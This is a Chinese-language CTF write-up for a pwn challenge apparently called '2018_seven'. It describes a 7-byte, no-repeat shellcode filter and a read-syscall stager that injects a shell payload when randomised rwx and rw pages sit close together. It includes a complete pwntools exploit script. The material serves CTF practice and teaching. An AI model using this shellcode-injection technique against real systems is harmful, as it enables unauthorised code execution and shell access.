先来看看保护

保护全开，IDA分析

首先申请了mmap两个随机地址的空间，一个为rwx，一个为rw

读入的都shellcode长度小于等于7,且这7个字符不能重复。

然后把一个叫initial的东西复制到rwx_page上,再把我们写的shellcode拼接到其后面

可能有些不太准，等会儿gdb调试的时候再看看

gdb调试进入执行的shellcode，分析一波

可以看到这是刚刚的那个initial,执行完了是这样的

RSP指向一片空白的区域。看到RAX，rdi为0,这里我想到了shellcode注入。我们要尽力构造sys_read来注入全部的shellcode,但是我们输入shellcode有限制。

这里我在调试的时候突然发现有的时候RSP跟RIP很近。因为RSP对应rw_page而 RIP:对应rwx_page，

这两块地址是随机的，所以存在他们离的很近的可能性。下图是我截到的图。

执行完initial的情况

好了我们现在只要做2件事。

1. 构造read(0,RSP,len) 这里len必须要大一点

   push rsp
   pop rsi
   mov dx,si
   syscall

1. 注入我们的shellcode，覆写syscall之后的指令

   'A'*0xb37 + asm(shellcraft.sh())

毕竟这也是随机的,多试几次就行了。

exp:

from pwn import *
#context.log_level = 'debug'
context(os='linux',arch='amd64',endian='little')
p = process('./2018_seven')
#gdb.attach(p,'b *0x555555554d0b')
shellcode = asm('push rsp;pop rsi;mov dx,si;syscall')
p.sendafter('shellcode:\n',shellcode)
sleep(1)
p.sendline('A'*0xb37+ asm(shellcraft.sh()))

p.interactive()